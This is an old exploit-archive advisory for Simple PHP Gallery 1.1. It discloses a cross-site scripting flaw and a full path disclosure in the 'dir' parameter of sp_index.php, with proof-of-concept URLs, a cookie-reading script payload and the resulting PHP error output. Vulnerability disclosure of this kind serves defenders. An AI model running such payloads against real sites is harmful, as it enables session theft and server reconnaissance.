Cross site scripting & fullpath disclosure Simple PHP Gallery 1.1

2006.12.06

Credit: Al7ejaz Hacker

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-6273 | CVE-2006-6272

CWE: N/A

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                                 ;;ii,,::						+
+                                                 ::::            ::              ;;tt;;::          					+
+                                                 ;;::          ..,,::            ;;ii,,::          					+
+                           ,,,,                ii;;,,          ii;;::            ;;ii,,::          					+
+                           ii::                tt;;,,        ..tt;;,,..          ;;ii;;::          					+
+                         ii,,::                ttii,,        ..ff;;;;::          ;;ii;;::          					+
+                         tt;;::..,,            tt;;,,          ff;;;;ii          ;;ii,,::          					+
+                         tt;;::;;::            tt;;,,..        jj;;,,..          ;;tt,,::          					+
+                         tt;;;;,,              tt;;,,..        tt;;;;            ;;ii;;::          					+
+                     ..::,,;;,,                tt;;,,..        tt;;,,            ;;ii,,::          					+
+                 ..::,,ii;;;;..                tt;;,,..        iiii,,::          ;;ii,,::          					+
+               ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::          ;;ii,,::          					+
+             ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::          ;;ii;;::          					+
+           ;;;;::      tt;;::                  tt;;;;..          ff;;::          ;;tt,,..          					+
+         ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,          ;;ii,,..          					+
+       ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,          ;;ii;;..          					+
+       tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,          ;;ii,,..          					+
+       jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,          ;;ii,,..          					+
+       ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,          ;;ii;;..          					+
+           ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,          ;;ii,,..          					+
+                       iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,          ;;ii;;            					+
+                       ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::          ;;ii,,            					+
+                         jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;            ;;ii,,            					+
+                           jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::            ;;ii::            					+
+                             iijjjjjjtt;;            ;;ffffjjjjtt::              ;;ii              					+
+                                                           ;;..                  ii;;              					+
+                                                                                 ..       						+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker														+
+																	+
+Script : Simple PHP Gallery 1.1													+
+Impact : Cross site scripting & fullpath disclosure											+
+																	+
+																	+
+Fullpath disclosure :															+
+																	+
+http://localhost/sp_index.php?dir=[Somthingwrong]											+
+																	+
+Result																	+
+																	+
+																	+
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10	+
+																	+
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11	+
+																	+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147					+
+																	+
+																	+
+																	+
+																	+
+Cross Site Scripting															+
+																	+
+																	+
+																	+
+dir variable is not probrely verified and can be used to execute html and javascript code						+
+																	+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</scrip
t>								+
+																	+
+/Milw0rm																+
+																	+
+																	+
+in subject hot :  Cross site scripting & fullpath disclosure  ;)									+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cross site scripting & fullpath disclosure Simple PHP Gallery 1.1

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.